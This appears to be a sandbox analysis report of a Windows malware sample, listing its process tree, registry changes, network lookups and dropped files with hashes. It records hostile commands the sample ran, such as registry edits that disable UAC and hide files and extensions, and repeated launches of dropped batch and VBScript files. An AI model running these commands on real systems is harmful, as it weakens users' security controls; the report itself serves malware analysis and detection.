cmd /c ""C:\Users\Admin\AppData\Local\Temp\KUoQMswA.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-800541130-1164841657-172018901511260562088793640638296462104904784111230971406"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1830072767-122997395670699997069001237-1043845226-1079128588-10432024951438400711"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\DYAcYEIM.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\XsQokEcI.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\dWcAEggQ.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-784035048-166413864605808361-4426283801021084200393762534-740277760-1918157851"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\OqEkUggg.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\aKcEYYUI.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "740688203827253076-1735264909-983149030-863477698-17518203971900879141-2056075572"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\KWcYMsMg.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\pYQgAAUQ.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1476148133-4736523316539753-133572799-1700338097440291939-5570796531774458800"

Network

Country Destination Domain Proto
US 8.8.8.8:53 google.com udp
GB 172.217.169.14:80 google.com tcp
GB 172.217.169.14:80 google.com tcp
US 8.8.8.8:53 google.com udp
GB 172.217.169.14:80 google.com tcp
GB 172.217.169.14:80 google.com tcp

Files

memory/2196-0-0x0000000000401000-0x0000000000476000-memory.dmp

\Users\Admin\mkcUkYkA\KGAQwQEs.exe

MD5 4e69aeccad6e4c472c36bec861f14414
SHA1 f2349726fdaf0597e26cc4577c188cbaaf266cdf
SHA256 62836b4b7ffbcebb04e42ac17e1fa96563e4dbb112771902242afde2a4328549
SHA512 4e5ce89f4e9314bc50462c56ef26ea47d82a37e2d2dedac300ed2de4b9f45faeeec407f1ed1ee85236789e52d377c0f11676e4c8474ac3c9852af6f654360628

memory/2756-12-0x0000000000400000-0x000000000046F000-memory.dmp

C:\ProgramData\YKcAIoYs\DGQIEEQU.exe

MD5 7225baf8f50d7035dfb155bf7102a3a6
SHA1 31943797a0390de208f3448966b09b8ed7cf1aa9
SHA256 ce328a13a643dac429956a8e6c3fa34eeb22f23c1638cf2c1b6ca110e594ce34
SHA512 0a8171928baf8eceaaf1786e75a0f62ffd49017474db76d665a946333c111cbadf559ce8dd57c00e6bdc6eda302508519bf00a38fcd46e7079a6271f8c8d02a4

C:\ProgramData\ogogoYAQ\pSoMwskA.exe

MD5 d80ce13272dd98970a4e578dec3b0714
SHA1 4172f0431ff6ba4643ed7d29ca90389e0a8aa523
SHA256 57fce21abf49f24981ec333639afe7e6caff48809f5e8b9e588f3b953df91897
SHA512 891e7d82594bb299e10e369f824d3f910c60814933930c7bba8650383c6b806f649da03bf932b59ec2d6943d03f80231176acc7639e006a74f8916dc85589777

C:\Users\Admin\AppData\Local\Temp\EIMcYMkw.bat

MD5 5a89324b6346e9c71a3c260ea016ac68
SHA1 83195518f52bc4814010981490cce21e1b183dda
SHA256 abdef2dc6a3c62ebacbb8c49d65037834ff6f3a94cccca9c1b87881d009a287b
SHA512 14a0af5a3f44247a7043eca307d27890fa709043132f95665392641bec1194e61be4810e04092701df2032ad683897738a27e1720d4b225f30c6f18fb9f50e9a

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

MD5 3b20f5e18b71fcd1d72cfc04349c721f
SHA1 3438a78d3c3b5a9c65a0f5f1d0110adda4d501f3
SHA256 8bf0705e02cfee4457efbaef3cc5f5aeb680d20dcbd7c8d893f386da85baafa4
SHA512 d7eed3b09ebcd4d9e9dacb4f306d5dea2283ac855242dbb66236547666a0699844a85b3edc21ef0b5313ad050465dd2b7184f8cf0b264b981fc85bdd455cde28

C:\Users\Admin\AppData\Local\Temp\qOIgwsQM.bat

MD5 8a61f670565860d6c590982ede087cae
SHA1 2b1b3787c47e3d09bfd1160ebf6e2868caae32ab
SHA256 572613baef8fb07c19d62f4de9234f11b9c48d5223a3fe6de90c4ed0377d2958
SHA512 76ef812cfb744fb65ec4778b2dbca28b5db85b8ec44a50a9f14336f7d27e325925c15e3c895e9e6c9a143ad097133c713afa1c2d678373b00a4d7a3af1a599e2

C:\Users\Admin\AppData\Local\Temp\EEMUcIwc.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\xWocUcQk.bat

MD5 aab0a9b3c017dec72426c5830afcccd9
SHA1 66c3c833ddd11df84a8b1e68d9b6592cf22fc8da
SHA256 75de9865f6b67ade828c328c5f62ccf774e7f6fb69064f0892cf54df303c0647
SHA512 41cfbf05c569098ad9d2b8f5ba358dfa025627beb954656025955b9e63421e120d404e03d2c3e3cdd8b91feeb86d74c48c8b489e866cabdb42ab96ab2a340acb

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

C:\Users\Admin\AppData\Local\Temp\tYooIIIs.bat

MD5 1aa40e93e8da2373959c014348107f39
SHA1 4c65bd631fdbce24e02e8d33ba4e82833a7bfb01
SHA256 d9a684cfd661a8ba1bb9c42de6df714d673f90e4802d5b3b7fecac7d042bdeb2
SHA512 30fdc01cc1a77ad187c8e03650bb96494b7f21b902bb945e2cb630289b2b1c7716430d9194768d3f0b50d78f3040e5b9714edf551b21383b9a4700af88428357

\??\PIPE\samr

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\PEIAEAsk.bat

MD5 d397abc69c5045a546c5efe44512e726
SHA1 4d4d3e94d4ed05a8dcaa45319bc08bc0af422cdd
SHA256 e0f1d8cb035e393db14b013c25737c76d367c8c238cede5d30b600cad7182a20
SHA512 b61a2138e2872750580d439515ecb0a523cceaf604269cb49912739e521950ec5492dc2373400f57f2a34abe758e682acecbc4c4aa8c4daf134c2f9a160acaca

memory/2196-119-0x0000000000401000-0x0000000000476000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\zKQkkwIk.bat

MD5 0936a05c71de347d34b5a0b9320e8070
SHA1 b22b38ca4270f9c89ef7ea2876529434f4e055e5
SHA256 13a20dfe360e268e01f03f97bffcfdc41652359218b711ecd2632e78310a4c17
SHA512 2212519923251330a7a6376f8db8e9d493e33ca015eea1f6c5c43c1a1f33bb0e44556ef1c192002f048e97099b3f478037e03b4a759ae526c62fe4e250cad516

C:\Users\Admin\AppData\Local\Temp\WaoEQMwI.bat

MD5 286ab4961faf20fd231e5e328b516439
SHA1 6c6def1b0bb3ed3e7b119386c0a569f91cb51364
SHA256 35e92994c99e951dad8b5ed2daf264d633c3f34d5946681d4cde8d948ff7d249
SHA512 4ee2d866e4fc47f5a56e9d8125d7ff7cae9b6532d030a7d81c2d882da8367bdce17b7e9a5a68944c10966e166e6183fc765de8f224cbe21c681c79a4d35ef068

C:\Users\Admin\AppData\Local\Temp\sIEQMgAY.bat

MD5 f17b3296797687dc0ac64f747ddc2137
SHA1 5de1edd716b65492f6110ee847f25025aac066eb
SHA256 bd4d6d183ab01ba337b460f50ab19bd3c63ca4b95da9e9dda4a64f7d4b377792
SHA512 0d3e4cf98c629be1352650e25b89de78aa1ec0910dcfc8210fe6265a56e3dd0b884e70f4aef459da2f6fcc078b5c05261673d561574ad0db4cbddf28f1106c90

C:\Users\Admin\AppData\Local\Temp\KAIcMsQE.bat

MD5 dfb18a4e7ce886e0266002574cb129d2
SHA1 ae448992b75e2cc7069f5aac7752e1a390e99ca5
SHA256 2b1cb589a18a60b27e1e524265c5ff6a467a91dab6a0c49c77e66c6c62425db7
SHA512 a6d439f2d1eb789e7cf7dfbce9167d0796e92e12187cabe50f913b8843b0127cb239ef392d58d0296c55f52e80cce92b3f0082b920b38137ca17c010685cf815

C:\Users\Admin\AppData\Local\Temp\GokIUocA.bat

MD5 840ef1653598987611d894f8fcb32128
SHA1 118fb84dff24c914afe33461ba4312382c4055fc
SHA256 60e6fe5d3c5240cd67fa9c6d66ec2d9b436dc1741de6f6151adfbcf7d58219c4
SHA512 1e41f9326d1b42088d726fc97972cbdd919f1293f6a03abb48bc1e137539ba32a81c8b3f7b1931e41cba2bb2eb4bc2c720585538950dca5fb4325da92db3dce0

C:\Users\Admin\AppData\Local\Temp\bYEAIMoM.bat

MD5 e597a3a5bd9a4d939c680bebf78b1e94
SHA1 3b66ecebf39cc96f169759c932a2a108ff34da60
SHA256 924df5a9273efbfef0411b3826f3b768d1e4145a0465a0a58e2b1c4e4bc4cda3
SHA512 06fc854f8020563ebef2bbbe226c5e82244d4aac9ad25570caa5ab943e94340780e4ff5908beaed4da0e5afff010d6fdd5246a3dade0a28c8a19c9121b8f9faa

C:\Users\Admin\AppData\Local\Temp\JqsQsAQM.bat

MD5 8746484f8ac3aed4ee5289080ed1bcb7
SHA1 419ad46e2197e66dcb9f96029ab1f36eab0ef4e5
SHA256 45b736d9fea11796a408a99411e32d25ed6cf6e84a167473cd3e24513c08121b
SHA512 92823281f86cfbd54c8f4528754cca7ab0a1391ca6bd0d3dbe197202733480e64576583ea831366dbd4afcccfbeecd15206605152cceadf8e3f932032eaca4c7

C:\Users\Admin\AppData\Local\Temp\DAogQkQY.bat

MD5 808e0d5ce900750e83ff844904d00a25
SHA1 68b75bebba11631427f59ad0e2662ab482d76f66
SHA256 19989c37fd22e677813c44fb6fb460b25a3f32cd139c8ddf2c60f005b7f9dbc1
SHA512 f4f22b89bfcafaece5eecb83d5fee2a6663b8814d44abe66167fc17737c8be12744ab8a8f76e586e1c8a39756a06d1bbe71fefdc2be4ea42a9ecd6c5758be0e9

C:\Users\Admin\AppData\Local\Temp\gUYcAssA.bat

MD5 47fe41bf914eda2f42d9aee04d964e6d
SHA1 f4d6f0866ad63850b0ef3f372d7cd3c424022a81
SHA256 a6985b85074080085cda4bef3569954fb319ae3ac8f7f3cc08b6c892c70dcc94
SHA512 4487198a36f41cfba1ea644d97cb6d6ddf543bae164b84b70ca8241211e5defdeca5196df84e53ed544b25add664294152753042a91687a94861875a57541263

C:\Users\Admin\AppData\Local\Temp\MyIMQMsA.bat

MD5 49c4383a4a57862cb851d34c01eb78f7
SHA1 58742be47071cd964970e699b6d2badfd0a0588d
SHA256 786e9a67abbddb8a6343c215a064b1c0b94de14d96f7ca3dbf486991bc4004b2
SHA512 e4c12ce5e7da701dac288cf8500afcf413cfa0b7d1eaf6f41cd000ce09a6a594917daf0457ba9caeac5b9fdcad6f9d88f1391086619e9f79f3bbce312df05bc3

C:\Users\Admin\AppData\Local\Temp\uIcIYIgs.bat

MD5 aa91da279d546e75a8090a0adc8312fc
SHA1 653193344e7ea880f3e69be128b10d9e9671e242
SHA256 16355019b73e138578784ff49133543b5c9df231afbb18d1e3d0796c7f78c4b5
SHA512 da7089f8f622e1dba5188540dfafcdf856789e79dd9ebdaf811924b3a0c1868204bbb6cd1c2c71598eb0d8267474236ab1cdd23ffdc313a654df027a6b0244d6

C:\Users\Admin\AppData\Local\Temp\WmMoQsIY.bat

MD5 40d3f32ebff0247d15316028938942b2
SHA1 0604ee279d603e606c710032dbcb9f2c0a0ee10c
SHA256 11e6df35cb09db54440afb122f76e314f1f97f2257142b0d52b60ef768448209
SHA512 b6b491414c8d955b9d875f73cc35c4eda0636dc532a2fe06c5f0c2321dc13f72fd3ed0e7a594393ba3dd6bc7f707389c5ec2a8b9578d952531f4a9da97e2f944

C:\Users\Admin\AppData\Local\Temp\PiwkMscc.bat

MD5 088d6a3364af3dd470742e56b2ccebc0
SHA1 9d9051bdd111a38f7ae9767667a60f4ac9b41a9f
SHA256 54a0c68f38ec0496f669a7b59f2392ff59c2583928264f25e851d6acfda6b11c
SHA512 a39624ccb2f03f5fa6c340400c3df13ea3dc29414a429912390d8b2c85e0ab92c2d2cefa349b764e15be74ce3cd98b087f6ba93b4f164e4787679e83a85acc05

C:\Users\Admin\AppData\Local\Temp\HmckUYMI.bat

MD5 e770d3cc8c4b1e3f9f6d94b04829359a
SHA1 8bd05aee4c2b9cbb57eb9729fc5739acfbd53985
SHA256 f1811f1efed487b48629806d42350702b5799b1ec55a59feb6420760b02e2362
SHA512 436e8d763b00919217d31b3db8190f71226c5205e38eed3e29f74147f05d0187963ac6abca92387b100506cdbfac41ea849f8ebdf9e63a775719af3937a2fb44

C:\Users\Admin\AppData\Local\Temp\lywEUoMc.bat

MD5 8d5818a6900de776827192b0b6fa2693
SHA1 6d36bac30d426f3fe60968f81d8aefe8d6e571e4
SHA256 ccbff5850c123e22636d834c2b742788d1f7932a1cbe509737740e00271d0ab6
SHA512 42d43be3b31785ad08d4dfa5b5bbb17b6fd680c9b57c2833f52f03df6ef9553f520e4df4b1513fcbe865f8f8e6f442973405524d37abb62ed0efee29565d94f3

memory/1724-424-0x00000000776C0000-0x00000000777BA000-memory.dmp

memory/1724-423-0x00000000777C0000-0x00000000778DF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\jwwgwIQk.bat

MD5 9920722c262edde9c1399a1d97c24599
SHA1 beb1f8e69e21d77ff815a2f0a91e7894d1917fde
SHA256 8ccbc1f311085da91fbbd82bd068ffb58e23ab0b84772695ecb5c970cb725287
SHA512 2c6d3a1ae0def1da331b3266765e9ea4ab2f0036306116b619a6d3726f61729499f790735b141a71941f79e0824cd8c1bda7ade54e694bb3387fb03f0ae68951

C:\Users\Admin\AppData\Local\Temp\WOEkIsEM.bat

MD5 5e1c50af1bbe47bcdb4348f3553e9c05
SHA1 7ffeff5bc131b9e8c0b5770a64f423518c8e6005
SHA256 cd4a00afc8921e806f2602e202de90bdc6c6d19eeff3cb32bddd2922d6c6f992
SHA512 3786ec05ffcf92dce0b603dadf8ad3a5c1345d36f62cbfac0f1f2b61362a6cdaba7480c4ed7f7d611e82cc54b6404493cb449ba7825d2e96eed9663af9384746

C:\Users\Admin\AppData\Local\Temp\CUcG.exe

MD5 14d62cd46065b473b52244515271125e
SHA1 04dfb788189d3b609f1ee6b053eb022be7ae457a
SHA256 e73599f8e6349f889501b1d823bb059e7486c059fcf1b85202ce9f5d93de953c
SHA512 bf6debb9ab25badc51af0d4a8a2e88a10366946c66401cc0dbd9d779aab5802633ecaf752c8b142f40c4e8ddd65a0302dbb4c67056d1e649f52452e7d2bcb93d

C:\Users\Admin\AppData\Local\Temp\EwwG.exe

MD5 7c00c694946c1e4e8d7ec2c23e40eac6
SHA1 061a57dc4d3ac7693f79557f003be349f5194553
SHA256 8f1f75d6c4da04d308369b3559489cca20cf17f104186d3e5801e906e86b6710
SHA512 b3f6a2b1b575cb8b134722e6ebadbe864f1db2c09356365a06a98b6da457531c4bd99ee8bb33fff4eb952e8bf6b6127be076763eb023496b963dd6a4cd2cbee3

C:\Users\Admin\AppData\Local\Temp\YaUAgIcE.bat

MD5 01959fb526d356ec578360fa73e54f31
SHA1 944c80b5a56d50c543b1427ea0b8ce2518974d8b
SHA256 762990e229e6605cf57796ab2e3ff06924f4660c1606ccddcb192a6fc9a8cbbb
SHA512 d3b56a851063cbe31bbcb478e5db208092b375da4e32ff58e2f2334dfdbcd9cced636e41ca427a29b489f143b159ad4345495b0ae07ac9f2c740c3fceca90e5a

C:\Users\Admin\AppData\Local\Temp\sIEk.exe

MD5 87b90004437cde5c91b21fabe7776c29
SHA1 12730fc99da62ae599990be3912404762b561189
SHA256 8d1b51b190ac8d3a0af0b4e6457750444165aace344f2fba60eafe7bade4771f
SHA512 74b988df93f50362cf22a3102de2f93ad3936d3d452edf3057bf767296dc4c5dca089706865fff99c60872fc9e62b64495bbc826ca011f896244b8c2bbbd1122

C:\Users\Admin\AppData\Local\Temp\EAkw.exe

MD5 dd9573aef939fb6a36ec6ba2bee623ce
SHA1 bb9223f9304e9654df1f9b0695c4b228622839e8
SHA256 8d4114ba7beae70ef240e475365eadd7f0296a2688ca274e1919e8345b86d195
SHA512 75a4133692cae5f08e9c863229d853867cf27e297e5875b4808fde88232ce3f107a4c5573acb5440aa73fe5f922ac4010e482be842fde8e3b2261a751a582139

C:\Users\Admin\AppData\Local\Temp\sWgk.ico

MD5 47a169535b738bd50344df196735e258
SHA1 23b4c8041b83f0374554191d543fdce6890f4723
SHA256 ad3e74be9334aa840107622f2cb1020a805f00143d9fef41bc6fa21ac8602eaf
SHA512 ca3038a82fda005a44ca22469801925ea1b75ef7229017844960c94f9169195f0db640e4d2c382e3d1c14a1cea9b6cc594ff09bd8da14fc30303a0e8588b52a7

C:\Users\Admin\AppData\Local\Temp\agoA.exe

MD5 765ef0d77b00fff9544069de8ecef85a
SHA1 ad63726f43305316e1a10c1660f2a06142e4de79
SHA256 74491e991faa2cad7e22687829229648dec2e5253f04c54d4f8a5d5b0f60c51a
SHA512 0fadcdd59a6256ad124eca87afd25e0c4900b30559fad815f56eb30506227be1fae747991854809b81f9cacf1f574fc8dee70a366e380a7e9df134a13a1f06f2

C:\Users\Admin\AppData\Local\Temp\ScgcIAkM.bat

MD5 9cebca2bccd1ca6875abba5e05307f79
SHA1 6c3e6c524e28194a72458d562217772b2cc553ec
SHA256 a72571b2b2d2598783a51f60ade5bd16924e5dded538f0df2309406ad7be0add
SHA512 c219220d673e952508de30b0cce43f02dafafc09105b11affae8d2fa1ee911280e2f74c61cd8f20023a163620801a9a97e6be785c8e36181acfb3a1043c8a4e9

C:\Users\Admin\AppData\Local\Temp\CEUu.exe

MD5 2653cb209f956ba5e09c30631e64d883
SHA1 c0c4d6ab3edc4f21e7ba40ae9c442527606bee94
SHA256 d1b43c628b63055c3f080f8a3e5304355c93258235b7f71d5be9669681231724
SHA512 1a0e1199fd9087669c0eaf90527a4f74b60eed8821a69169fa62e8d77e65caed5694b51e10237630e5d0d1ea792a3fc1337768dfd45e7f0c12b4b133bffaed85

C:\Users\Admin\AppData\Local\Temp\AAYa.exe

MD5 a4acb0e163edd3357c33978e5114f75e
SHA1 bf8ab936dad8ce4b78f012e81fbe20b479d0f575
SHA256 5cddb3e673338be53ba490749b9fc2ffdaaf74eb4b33b94c6ffcb1e7056e1c05
SHA512 615716f0a11fa36d78c0f01adc594bd507ac894e9d6754b151cd00554b51c754e993ce674845a9397f8d58ae1bdf6fd4f0610c9fe41073ca07c98ddd4e15080d

C:\Users\Admin\AppData\Local\Temp\Gkco.exe

MD5 c10e613085f6faae8fd8fce6d48f8c69
SHA1 bd3c1619653cc676699870e1f0fa3b416e1efd6b
SHA256 1f3e4fa88df3d6cc394720c781f6a7223fcf4970b7033ba3bb2d4528947a7834
SHA512 72b0c424bd70f951e4868d3334fb10dc2a3f35f94eb3a762a2063d3ca8a4f8aa8103a7d0a3c10f65b7b1dd987d1f6f9268c62c3711b89c3be437f3641b7e5e74

C:\Users\Admin\AppData\Local\Temp\ogUu.exe

MD5 ee7299806f0db8903c073e952584f72d
SHA1 c1bdfd2742e6d65c24f5f97afaf1d390c7781056
SHA256 309eeadca7e9e3a46036c19e61eb979fc90b3b1758f3fcd2d9254f350bd19253
SHA512 81f08ccb478435348467ed55e2141d1c200ddc55f800ec4233cd5966722af5972fdd1cf27eacd555afb08f0079f4ce176d007c1b3af62163b70e771765111e03

C:\Users\Admin\AppData\Local\Temp\SscG.exe

MD5 164272cd780df3ed9f4078094058fe54
SHA1 cb930f287579e0b18c00fd4672f9c90fb6965bb9
